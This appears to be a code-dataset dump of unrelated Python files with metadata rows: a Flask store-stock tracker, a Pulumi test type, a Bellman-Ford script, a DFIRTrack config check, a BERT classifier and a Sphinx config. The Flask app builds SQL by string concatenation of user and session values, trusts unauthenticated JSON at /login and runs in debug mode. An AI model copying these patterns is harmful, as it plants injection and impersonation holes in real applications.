provide_status = SubmitField('Provide Status')
# declaring app name
app = Flask(__name__)
mysql = MySQL()
# MySQL configurations
app.config['MYSQL_DATABASE_USER'] = os.environ["MYSQL_USER"]
app.config['MYSQL_DATABASE_PASSWORD'] = os.environ["MYSQL_PW"]
app.config['MYSQL_DATABASE_DB'] = os.environ["MYSQL_DB"]
app.config['MYSQL_DATABASE_HOST'] = os.environ["MYSQL_URL"]
mysql.init_app(app)
def getStore(latitude, longitude): # get stores from coordinates
db = mysql.connect()
cursor = db.cursor()
store = []
ids = []
addresses = []
for i in range(len(latitude)):
query = 'SELECT name FROM all_stores WHERE lat = ' + str(latitude[i]) + ' AND lon = ' + str(longitude[i]) + ';'
cursor.execute(query)
data_store = cursor.fetchall()
query = 'SELECT id FROM all_stores WHERE lat = ' + str(latitude[i]) + ' AND lon = ' + str(longitude[i]) + ';'
cursor.execute(query)
data_id = cursor.fetchall()
query = 'SELECT freeFormAddress FROM all_stores WHERE lat = ' + str(latitude[i]) + ' AND lon = ' + str(
longitude[i]) + ';'
cursor.execute(query)
data_address = cursor.fetchall()
# rcount = len(data)
# print(rcount)
if (len(data_store) != 0):
store.append(data_store[0][0])
ids.append(data_id[0][0])
addresses.append((data_address[0][0]))
cursor.close()
db.close()
return store, ids, addresses
def getItemStatus(selected_item, store_id, num_to_average): #get the status of the selected item using moving average
db = mysql.connect()
cursor = db.cursor()
query = "SELECT rating FROM status_list WHERE id = '" + str(store_id) + "' AND item = " + str(selected_item) +";"
cursor.execute(query)
status_values = []
status = cursor.fetchall()
moving_average = 0
for x in range(len(status)):
i = len(status) - x - 1
status_values.append(5-(status[i][0])+1)
if len(status_values) != 0:
for i in range(min(len(status_values),num_to_average)):
moving_average += status_values[i]
moving_average = moving_average/min(num_to_average, len(status_values))
cursor.close()
db.close()
return round(moving_average)
def getManagerList(raw_manager):
manager_lst = []
for x in range(len(raw_manager)):
i = len(raw_manager) - x - 1
manager_lst.append(raw_manager[i][0])
return manager_lst
def parseMessage(store, raw_item, raw_rating, raw_date, raw_user): # get status messages
messages = []
type = []
rating_choices = ['Full Stock', 'Majority Remaining', 'Half Remaining', 'Few Remaining', 'None Remaining']
item_choices = ['Toilet Paper', 'Hand Sanitizer']
color_array = []
for x in range(len(raw_rating)):
i = len(raw_rating) - x - 1
if raw_user[i][0] == None:
new_message = '' + raw_date[i][0] + ' Status of ' + item_choices[
raw_item - 1] + ' at ' + store + ': ' + rating_choices[int(raw_rating[i][0]) - 1]
else:
new_message = '' + raw_date[i][0] + ' Status of ' + item_choices[raw_item - 1] + ' at ' + store + ': ' + rating_choices[int(raw_rating[i][0]) - 1] + " - " + raw_user[i][0]
messages.append(new_message)
color_array.append(int(raw_rating[i][0]))
type.append(int(raw_item))
return messages, color_array, type
def getAddress(address): # get basic store information for landing page
message = 'Address: ' + address
return message
def getPhone(phone):
phone_formatted = ''
if len(phone)>0:
phone_formatted = phone[5:14] + '-' + phone[14:18]
else:
phone_formatted = 'Unavailable'
message = 'Phone: ' + phone_formatted
return message
def getItem(key):
items = {'1': 'Toilet Paper', '2': 'Hand Sanitizer'}
return items[key]
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
data = request.get_json()
session['user'] = data['user_email']
session['user_store_id'] = data['store_id']
return "Forbidden!"
@app.route('/location', methods=['GET', 'POST'])
def location():
form = LocationForm()
if form.validate_on_submit():
flash('Item requested from the user {}'.format(form.item_option.data))
flash('Item requested from the user {}'.format(form.distance_option.data))
flash('Item requested from the user {}'.format(form.address.data))
session['selected_item'] = form.item_option.data
session['distance'] = form.distance_option.data
user_lat, user_lon = tomtomSearch.geo(form.address.data)
lat_lst, lon_lst = tomtomSearch.search(user_lat, user_lon,1000*int(session.get('distance')),10*int(session.get('distance')))
stores, ids, addresses = getStore(lat_lst, lon_lst)
session['stores'] = []
session['ids'] = []
session['addresses'] = []
session['stores'] = stores
session['ids'] = ids
session['addresses'] = addresses
return redirect('/store')
return render_template('location.html', title='Location', form = form)
@app.route('/store', methods=['GET', 'POST'])
def stores():
form = StoreForm()
if request.method == 'POST':
#flash('Status requested from the user {}'.format(form.stores.data))
option = int(request.form['options'])
print(session.get('stores'))
session['selected_store'] = session.get('stores')[option]
session['selected_id'] = session.get('ids')[option]
return redirect('/item-status')
status_values = []
radio = {}
all_stores = []
store_info = {}
store_count = []
for i in range(len(session.get('stores'))): # append radio button options
cur_status = getItemStatus(session.get('selected_item'), session.get('ids')[i], 1)
if session.get('selected_option') == 'find' and cur_status==0:
continue
else:
#form.stores.choices.append((str(i), (session.get('stores')[i] + ' - ' + session.get('addresses')[i])))
all_stores.append((session.get('stores')[i] + ' - ' + session.get('addresses')[i]))
store_info[i] =[session.get('stores')[i],session.get('ids')[i],session.get('addresses')[i]]
#radio[i] = str(session.get('stores')[i] + ' - ' + session.get('addresses')[i])
store_count.append(i)
status_values.append(cur_status)
#form.stores.choices = [x for _, x in sorted(zip(status_values, form.stores.choices), reverse=True)]
all_stores = [x for _, x in sorted(zip(status_values, all_stores), reverse=True)]
store_count = [x for _, x in sorted(zip(status_values, store_count), reverse=True)]
sorted_info = []
for i in range(len(store_count)):
sorted_info.append(store_info[store_count[i]])
session['stores'] = [item[0] for item in sorted_info]
session['ids'] = [item[1] for item in sorted_info]
session['addresses'] = [item[2] for item in sorted_info]
status_values.sort(reverse=True)
print(session.get('stores'))
for i in range(len(status_values)):
s = str(session.get('stores')[i] + ' - ' + session.get('addresses')[i])
radio[i] = s
form.stores.choices.append((str(i), s))
storeFound = True
print(radio)
if len(status_values) == 0:
storeFound = False
status_types = ['Full Stock', 'Majority Remaining', 'Half Remaining','Few Remaining', 'None Remaining']
return render_template("store.html", type_query = session.get('selected_option'),storeFound = storeFound,status_types=status_types, dist = int(session.get('distance')),len=len(form.stores.choices), form=form, status_values=status_values, radio = radio, selected_item_index = int(session.get('selected_item')), selected_item_name = getItem(session.get('selected_item')))
@app.route('/item-status', methods=['GET', 'POST'])
def status():
status_form = StatusForm()
if request.method == 'POST':
user_email = ' '
print()
if session.get('user') == '':
return redirect("/item-status")
db = mysql.connect()
cursor = db.cursor()
user_email = session.get('user')
flash('Status requested from the user {}'.format(status_form.status_option.data))
#flash('Status requested from the user {}'.format(status_form.item_option.data))
tz = timezone('US/Eastern')
now = datetime.now(tz)
date_now = now.strftime("%m/%d/%Y %H:%M:%S")
# add manager
query = ''
if session.get('user_store_id') == session.get('selected_id'):
query = "INSERT INTO status_list(date, item, rating, manager, store, id, user) VALUES('" + date_now + "'," + session.get('selected_item') + "," + status_form.status_option.data + ", 1, '" + session['selected_store'] + "', '" + session['selected_id'] + "','"+ user_email+"');"
else:
query = "INSERT INTO status_list(date, item, rating, manager, store, id, user) VALUES('" + date_now + "'," + session.get('selected_item') + "," + status_form.status_option.data + ", 0, '" + session['selected_store'] + "', '" + session['selected_id'] + "','"+ user_email+"');"
cursor.execute(query)
cursor.execute("COMMIT;")
time.sleep(0.5)
cursor.close()
db.close()
return redirect('/item-status')
db = mysql.connect()
cursor = db.cursor()
get_query = "SELECT rating FROM status_list WHERE item = " + session.get('selected_item') +" AND id = '" + session['selected_id'] + "';"
cursor.execute(get_query)
raw_rating = cursor.fetchall()
get_query = "SELECT date FROM status_list WHERE item = " + session.get('selected_item') +" AND id = '" + session['selected_id'] + "';"
cursor.execute(get_query)
raw_date = cursor.fetchall()
get_query = "SELECT user FROM status_list WHERE item = " + session.get('selected_item') +" AND id = '" + session['selected_id'] + "';"
cursor.execute(get_query)
raw_user = cursor.fetchall()
get_query = "SELECT manager FROM status_list WHERE item = " + session.get('selected_item') +" AND id = '" + session['selected_id'] + "';"
cursor.execute(get_query)
raw_manager = cursor.fetchall()
# get basic store info
get_query = "SELECT phone FROM all_stores WHERE id = '" + session['selected_id'] + "';"
cursor.execute(get_query)
raw_phone = cursor.fetchall()
get_query = "SELECT freeFormAddress FROM all_stores WHERE id = '" + session['selected_id'] + "';"
cursor.execute(get_query)
raw_address = cursor.fetchall()
messages, colors, type_item = parseMessage(session['selected_store'], int(session.get('selected_item')), raw_rating, raw_date, raw_user)
managers = getManagerList(raw_manager)
basic_info = []
basic_info.append(getAddress(raw_address[0][0]))
basic_info.append(getPhone(raw_phone[0][0]))
#user_email = request.get_json()
cursor.close()
db.close()
if session.get('user') == '':
return render_template("status.html", managers = managers,type_query = session.get('selected_option'),signIn=0, store=session['selected_store'], form=status_form,
messages=messages,
len=len(messages), colors=colors, type_item=type_item, basic_info=basic_info,
selected_item=getItem(session.get('selected_item')))
else:
return render_template("status.html", managers = managers, type_query = session.get('selected_option'), signIn = 1, store=session['selected_store'], form=status_form, messages=messages,
len=len(messages), colors=colors, type_item=type_item, basic_info=basic_info, selected_item = getItem(session.get('selected_item')))
@app.route('/index', methods=['GET', 'POST'])
@app.route('/', methods=['GET', 'POST'])
def homepage():
session['stores'] = []
session['ids'] = []
session['addresses'] = []
session['has_enabled'] = 'disabled'
session['distance'] = 10000
form = optionForm()
if form.validate_on_submit():
if form.find_item.data:
session['selected_option'] = 'find'
return redirect('/location')
elif form.provide_status.data:
session['selected_option'] = 'status'
return redirect('/location')
return render_template("index.html", form = form)
if __name__ == '__main__':
app.run(use_reloader=True, debug=True)
| 38.111979
| 374
| 0.610386
| 1,747
| 14,635
| 4.949056
| 0.135661
| 0.047421
| 0.035392
| 0.030534
| 0.418228
| 0.366875
| 0.337034
| 0.291349
| 0.262202
| 0.236641
| 0
| 0.00808
| 0.238879
| 14,635
| 383
| 375
| 38.211488
| 0.768112
| 0.050427
| 0
| 0.215094
| 0
| 0
| 0.189451
| 0.001726
| 0
| 0
| 0
| 0.002611
| 0
| 1
| 0.045283
| false
| 0.003774
| 0.037736
| 0
| 0.211321
| 0.015094
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
348c6299bee8c546cf7aa75e9c41522b146fab11
| 2,634
|
py
|
Python
|
pkg/codegen/internal/test/testdata/output-funcs/py_tests/pulumi_py_tests.py
|
sticha/pulumi
|
76ee1b8ccfee815eb315d9e0e0ddfaaf505c472b
|
[
"Apache-2.0"
] | null | null | null |
pkg/codegen/internal/test/testdata/output-funcs/py_tests/pulumi_py_tests.py
|
sticha/pulumi
|
76ee1b8ccfee815eb315d9e0e0ddfaaf505c472b
|
[
"Apache-2.0"
] | null | null | null |
pkg/codegen/internal/test/testdata/output-funcs/py_tests/pulumi_py_tests.py
|
sticha/pulumi
|
76ee1b8ccfee815eb315d9e0e0ddfaaf505c472b
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016-2021, Pulumi Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# These are copied from pulumi-azure-native or hand-written to
# compensate for an incomplete codegen test setup, we could fix the
# test to code-gen this from schema.
from collections import namedtuple
import pulumi
@pulumi.output_type
class StorageAccountKeyResponse(dict):
"""
An access key for the storage account.
"""
def __init__(__self__, *,
creation_time: str,
key_name: str,
permissions: str,
value: str):
"""
An access key for the storage account.
:param str creation_time: Creation time of the key, in round trip date format.
:param str key_name: Name of the key.
:param str permissions: Permissions for the key -- read-only or full permissions.
:param str value: Base 64-encoded value of the key.
"""
pulumi.set(__self__, "creation_time", creation_time)
pulumi.set(__self__, "key_name", key_name)
pulumi.set(__self__, "permissions", permissions)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter(name="creationTime")
def creation_time(self) -> str:
"""
Creation time of the key, in round trip date format.
"""
return pulumi.get(self, "creation_time")
@property
@pulumi.getter(name="keyName")
def key_name(self) -> str:
"""
Name of the key.
"""
return pulumi.get(self, "key_name")
@property
@pulumi.getter
def permissions(self) -> str:
"""
Permissions for the key -- read-only or full permissions.
"""
return pulumi.get(self, "permissions")
@property
@pulumi.getter
def value(self) -> str:
"""
Base 64-encoded value of the key.
"""
return pulumi.get(self, "value")
CodegenTest = namedtuple('CodegenTest', ['outputs'])
Outputs = namedtuple('Outputs', ['StorageAccountKeyResponse'])
outputs = Outputs(StorageAccountKeyResponse)
codegentest = CodegenTest(outputs)
| 30.988235
| 89
| 0.65186
| 327
| 2,634
| 5.137615
| 0.376147
| 0.057143
| 0.028571
| 0.045238
| 0.197619
| 0.197619
| 0.197619
| 0.102381
| 0.102381
| 0.04881
| 0
| 0.00813
| 0.252847
| 2,634
| 84
| 90
| 31.357143
| 0.845528
| 0.461655
| 0
| 0.181818
| 0
| 0
| 0.115323
| 0.020161
| 0
| 0
| 0
| 0
| 0
| 1
| 0.151515
| false
| 0
| 0.060606
| 0
| 0.363636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3490cf6f7075a2aef1693d69a9521b0b995d567b
| 604
|
py
|
Python
|
unidad2/pc2/e1.py
|
upc-projects/cc76
|
0f1663cc439889b0c7e924923639e7c2e032b9b6
|
[
"MIT"
] | 1
|
2020-09-21T16:56:24.000Z
|
2020-09-21T16:56:24.000Z
|
unidad2/pc2/e1.py
|
upc-projects/cc76
|
0f1663cc439889b0c7e924923639e7c2e032b9b6
|
[
"MIT"
] | null | null | null |
unidad2/pc2/e1.py
|
upc-projects/cc76
|
0f1663cc439889b0c7e924923639e7c2e032b9b6
|
[
"MIT"
] | null | null | null |
import math
def Bellman_ford(G):
n = len(G)
distance = [-math.inf]*n
parents = [None]* n
distance[0] = 0
for _ in range(n-1):
for u in range(n):
for v, w in G[u]:
if distance[v-1] < distance[u-1] + w:
distance[v-1] = distance[u-1] + w
parents[v-1] = u
return distance ,parents
G = [[(2,0)],
[(0,20), (3,20)],
[(4,-60)],
[(5,-60)],
[]]
win = True
distance, _ = Bellman_ford(G)
for i in distance:
if i <= -100:
win=False
print("winnable" if win else "hopeless")
| 18.875
| 53
| 0.463576
| 89
| 604
| 3.101124
| 0.41573
| 0.021739
| 0.086957
| 0.130435
| 0.152174
| 0.152174
| 0.152174
| 0
| 0
| 0
| 0
| 0.065104
| 0.364238
| 604
| 31
| 54
| 19.483871
| 0.653646
| 0
| 0
| 0
| 0
| 0
| 0.02649
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.041667
| 0
| 0.125
| 0.041667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3491846c1c297a3eafd5e93b910d0c66155d9336
| 1,743
|
py
|
Python
|
Incident-Response/Tools/dfirtrack/dfirtrack_main/exporter/markdown/markdown_check_data.py
|
sn0b4ll/Incident-Playbook
|
cf519f58fcd4255674662b3620ea97c1091c1efb
|
[
"MIT"
] | 1
|
2021-07-24T17:22:50.000Z
|
2021-07-24T17:22:50.000Z
|
Incident-Response/Tools/dfirtrack/dfirtrack_main/exporter/markdown/markdown_check_data.py
|
sn0b4ll/Incident-Playbook
|
cf519f58fcd4255674662b3620ea97c1091c1efb
|
[
"MIT"
] | 2
|
2022-02-28T03:40:31.000Z
|
2022-02-28T03:40:52.000Z
|
Incident-Response/Tools/dfirtrack/dfirtrack_main/exporter/markdown/markdown_check_data.py
|
sn0b4ll/Incident-Playbook
|
cf519f58fcd4255674662b3620ea97c1091c1efb
|
[
"MIT"
] | 2
|
2022-02-25T08:34:51.000Z
|
2022-03-16T17:29:44.000Z
|
from django.contrib import messages
from dfirtrack_config.models import SystemExporterMarkdownConfigModel
from dfirtrack_main.logger.default_logger import warning_logger
import os
def check_config(request):
""" check variables in config """
# get config model
model = SystemExporterMarkdownConfigModel.objects.get(system_exporter_markdown_config_name = 'SystemExporterMarkdownConfig')
# reset stop condition
stop_exporter_markdown = False
# check MARKDOWN_PATH for empty string
if not model.markdown_path:
messages.error(request, "`MARKDOWN_PATH` contains an emtpy string. Check config!")
# call logger
warning_logger(str(request.user), " EXPORTER_MARKDOWN variable MARKDOWN_PATH empty string")
stop_exporter_markdown = True
# check MARKDOWN_PATH for existence in file system (check only if it actually is a non-empty string)
if model.markdown_path:
if not os.path.isdir(model.markdown_path):
messages.error(request, "`MARKDOWN_PATH` does not exist in file system. Check config or filesystem!")
# call logger
warning_logger(str(request.user), " EXPORTER_MARKDOWN path MARKDOWN_PATH not existing")
stop_exporter_markdown = True
# check MARKDOWN_PATH for write permission (check only if it actually is a non-empty string)
if model.markdown_path:
if not os.access(model.markdown_path, os.W_OK):
messages.error(request, "`MARKDOWN_PATH` is not writeable. Check config or filesystem!")
# call logger
warning_logger(str(request.user), " EXPORTER_MARKDOWN path MARKDOWN_PATH not writeable")
stop_exporter_markdown = True
return stop_exporter_markdown
| 44.692308
| 128
| 0.729776
| 217
| 1,743
| 5.677419
| 0.308756
| 0.155844
| 0.081169
| 0.048701
| 0.478084
| 0.45211
| 0.45211
| 0.45211
| 0.301136
| 0.258117
| 0
| 0
| 0.205967
| 1,743
| 38
| 129
| 45.868421
| 0.890173
| 0.188181
| 0
| 0.227273
| 0
| 0
| 0.266238
| 0.019986
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.181818
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34940ee04b10ec17bfb59f0b5abe7be0ed5efa38
| 4,602
|
py
|
Python
|
models/bert_with_conversation_context.py
|
RobinRojowiec/intent-recognition-in-doctor-patient-interviews
|
b91c7a9f3ad70edd0f39b56e3219f48d1fcf2078
|
[
"Apache-2.0"
] | null | null | null |
models/bert_with_conversation_context.py
|
RobinRojowiec/intent-recognition-in-doctor-patient-interviews
|
b91c7a9f3ad70edd0f39b56e3219f48d1fcf2078
|
[
"Apache-2.0"
] | null | null | null |
models/bert_with_conversation_context.py
|
RobinRojowiec/intent-recognition-in-doctor-patient-interviews
|
b91c7a9f3ad70edd0f39b56e3219f48d1fcf2078
|
[
"Apache-2.0"
] | 1
|
2021-11-24T18:48:47.000Z
|
2021-11-24T18:48:47.000Z
|
import pickle
import torch
import torch.nn as nn
from torchtext.data import Field
from common.paths import ROOT_RELATIVE_DIR, MODEL_PATH
from models.bert_layer import BERTLayer
from probability.tables import TransitionTable
from utility.model_parameter import Configuration, ModelParameter
class BERTWithConversationContext(nn.Module):
def __init__(self, config: Configuration, class_count=100,
hidden_dim=100,
class_field=None, device=torch.device('cpu')):
"""
Simple embedding using position and previous class
:param config:
:param class_count:
:param vocab_size:
"""
super(BERTWithConversationContext, self).__init__()
# set parameters
self.hidden_dim = hidden_dim
self.class_field: Field = class_field
self.class_count = class_count
self.max_length = config.get_int(ModelParameter.MAX_LENGTH)
self.embedding_size = config.get_int(ModelParameter.EMBEDDING_SIZE)
self.device = device
# configure history components
self.with_position_embedding = False
self.with_class_embedding = True
self.with_utterance_classifier = False
self.with_transition_probs = False
# create and initialize layers
# learns embedding vector for class labels
self.class_embedding = nn.Embedding(self.class_count, self.embedding_size)
# learns class label for positions
self.position_embedding = nn.Embedding(100, self.embedding_size)
# load probability table and neural_bert_models
with open(ROOT_RELATIVE_DIR + MODEL_PATH + "transition_table.pckl", "rb") as file_prt:
transition_table: TransitionTable = pickle.load(file_prt)
transition_table.lambda_value = 1
transition_table.class_field = class_field
fixed_embedding = transition_table.create_probability_matrix(device=self.device)
self.transition_embedding = nn.Embedding(self.class_count, self.class_count)
self.transition_embedding.weight.data.copy_(fixed_embedding)
self.transition_embedding.weight.requires_grad = False
# embed previous sample
self.utterance_classifier = BERTLayer(device=self.device)
# output layer
self.dropout = nn.Dropout(p=0.5)
self.linear_input_size = self.get_embeddings_length() + self.get_additional_length() + self.utterance_classifier.get_output_length()
self.linear_layer = nn.Linear(self.linear_input_size, class_count)
self.softmax = nn.Softmax(dim=0)
def get_embeddings_length(self):
multiplier = 0
if self.with_position_embedding:
multiplier += 1
if self.with_class_embedding:
multiplier += 1
return self.embedding_size * multiplier
def get_additional_length(self):
add_length = 0
if self.with_utterance_classifier:
add_length += self.utterance_classifier.get_output_length()
if self.with_transition_probs:
add_length += self.class_count
return add_length
def forward(self, sample, previous_classes, positions, previous_sample, *args, **kwargs):
representations = []
# embed sample
sample_embed = self.utterance_classifier(sample)
representations.append(sample_embed)
# encode the previous utterance into a matrix
if self.with_utterance_classifier:
with torch.no_grad():
self.utterance_classifier.eval()
representations.append(self.utterance_classifier(previous_sample))
# learn vector representations for position and class
if self.with_class_embedding:
embed_previous_classes = self.class_embedding(previous_classes)
representations.append(embed_previous_classes)
if self.with_position_embedding:
embed_position = self.position_embedding(positions)
representations.append(embed_position)
# transition probs and apply dropout and
if self.with_transition_probs:
representations.append(self.transition_embedding(previous_classes))
# concatenate all representations
concat_class_and_position = torch.cat(representations, 1)
concat_class_and_position = self.dropout(concat_class_and_position)
# linear transformation
output = self.linear_layer(concat_class_and_position)
# calculate probabilities
probs = self.softmax(output)
return output, probs
| 38.672269
| 140
| 0.69535
| 517
| 4,602
| 5.909091
| 0.251451
| 0.031424
| 0.026187
| 0.028805
| 0.138134
| 0.053682
| 0.053682
| 0
| 0
| 0
| 0
| 0.005137
| 0.238592
| 4,602
| 118
| 141
| 39
| 0.866724
| 0.121469
| 0
| 0.136986
| 0
| 0
| 0.006531
| 0.005275
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054795
| false
| 0
| 0.109589
| 0
| 0.219178
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
349ac7bf295420ef2ab524ccb2bae107924bef1f
| 9,274
|
py
|
Python
|
docs/conf.py
|
myii/saltenv
|
2309e6759504f5326a444270c8e8bb3edf14b760
|
[
"Apache-2.0"
] | 5
|
2022-03-25T17:15:04.000Z
|
2022-03-28T23:24:26.000Z
|
docs/conf.py
|
myii/saltenv
|
2309e6759504f5326a444270c8e8bb3edf14b760
|
[
"Apache-2.0"
] | null | null | null |
docs/conf.py
|
myii/saltenv
|
2309e6759504f5326a444270c8e8bb3edf14b760
|
[
"Apache-2.0"
] | 2
|
2022-03-26T06:33:30.000Z
|
2022-03-29T19:43:50.000Z
|
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
import datetime
from pathlib import Path
# -- Project information -----------------------------------------------------
this_year = datetime.datetime.today().year
if this_year == 2022:
copyright_year = 2022
else:
copyright_year = f"2022 - {this_year}"
project = "saltenv"
copyright = f"{copyright_year}, nicholasmhughes"
author = "nicholasmhughes"
# Strip version info from ../../saltenv/version.py
with open(Path(Path(__file__).parent.parent, "saltenv", "version.py")) as version_file:
content = version_file.readlines()
for file_line in content:
if "version =" in file_line:
version = file_line.split(" ")[2].replace('"', "")
break
# Variables to pass into the docs from sitevars.rst for rst substitution
with open("sitevars.rst") as site_vars_file:
site_vars = site_vars_file.read().splitlines()
rst_prolog = """
{}
""".format(
"\n".join(site_vars[:])
)
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
needs_sphinx = "3.5.3"
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx_copybutton",
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.napoleon",
"sphinx.ext.intersphinx",
"sphinx.ext.viewcode",
"sphinx.ext.todo",
"sphinx.ext.coverage",
# "sphinxcontrib.spelling",
]
# Render TODO directives, set to FALSE before publishing
# This is incredibly helpful, when set to True, to know what is yet to be
# completed in documentation.
todo_include_todos = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = [
"_build",
"Thumbs.db",
".DS_Store",
".vscode",
".venv",
".git",
".gitlab-ci",
".gitignore",
"sitevars.rst",
]
autosummary_generate = True
# ----- Napolean Config ------------------------------------------------------
# For using Google-style docstrings in Python code as a standard, which is
# highly recommended. This improves tooling by expecting a standard way of
# using docstrings in your project.
# https://www.sphinx-doc.org/en/master/usage/extensions/napoleon.html
napoleon_google_docstring = True
napoleon_numpy_docstring = False
napoleon_include_init_with_doc = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
# ----- Intersphinx Config ---------------------------------------------------
# This extension can generate automatic links to the documentation of objects
# in other projects, such as the official Python or POP docs.
# https://www.sphinx-doc.org/en/master/usage/extensions/intersphinx.html
intersphinx_mapping = {
"python": ("https://docs.python.org/3", None),
"pytest": ("https://pytest.readthedocs.io/en/stable", None),
"pop": ("https://pop.readthedocs.io/en/latest/", None),
}
# ----- Autodoc Config -------------------------------------------------------
# This extension can import the modules you are documenting, and pull in
# documentation from docstrings in a semi-automatic way. This is powerful!
# https://www.sphinx-doc.org/en/master/usage/extensions/autodoc.html
autodoc_default_options = {"member-order": "bysource"}
# ----- Autosummary Config ---------------------------------------------------
# This extension generates function/method/attribute summary lists, similar to
# those output e.g. by Epydoc and other API doc generation tools. This is
# especially useful when your docstrings are long and detailed, and putting
# each one of them on a separate page makes them easier to read.
# https://www.sphinx-doc.org/en/master/usage/extensions/autosummary.html
autosummary_generate = True
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "furo"
html_title = f"{project} Documentation"
html_show_sourcelink = True # False on private repos; True on public repos
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ["_static"]
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# For example, official Salt Project docs use images from the salt-branding-guide
# https://gitlab.com/saltstack/open/salt-branding-guide/
#
# Example for >=4.0.0 of Sphinx (support for favicon via URL)
# html_logo = "https://gitlab.com/saltstack/open/salt-branding-guide/-/raw/master/logos/SaltProject_altlogo_teal.png?inline=true"
# Example for <4.0.0 of Sphinx, if added into _static/img/ and html_static_path is valid
# html_logo = "_static/img/SaltProject_altlogo_teal.png"
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large. Favicons can be up to at least 228x228. PNG
# format is supported as well, not just .ico'
# For example, official Salt Project docs use images from the salt-branding-guide
# https://gitlab.com/saltstack/open/salt-branding-guide/
#
# Example for >=4.0.0 of Sphinx (support for favicon via URL)
# html_favicon = "https://gitlab.com/saltstack/open/salt-branding-guide/-/raw/master/logos/SaltProject_Logomark_teal.png?inline=true"
# Example for <4.0.0 of Sphinx, if added into _static/img/ and html_static_path is valid
# html_favicon = "_static/img/SaltProject_Logomark_teal.png"
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "saltenvdoc"
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
master_doc,
"saltenv.tex",
"saltenv Documentation",
"nicholasmhughes",
"manual",
),
]
# -- Options for manual page output ------------------------------------------
